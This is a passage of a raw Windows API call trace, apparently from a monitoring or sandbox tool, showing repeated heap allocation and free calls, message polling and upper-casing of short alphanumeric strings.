hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0254.777] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.777] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0254.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0254.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0254.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0254.779] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.779] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0254.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0254.779] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0254.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0254.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0254.780] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0254.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0254.780] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0254.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0254.781] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.781] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.782] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0254.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.782] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.782] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0254.782] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0254.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0254.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0254.783] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0254.783] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0254.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0254.783] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f60 [0254.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0254.784] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0254.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0254.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0254.784] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0254.785] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0254.785] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0254.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0254.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0254.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0254.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0254.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0254.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0254.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0254.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0254.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0254.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0254.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0254.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0254.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0254.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0254.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0254.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0254.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f45c8 | out: hHeap=0x25c0000) returned 1 [0254.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0254.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.789] HeapFree (in: hHeap=0x25c0000, 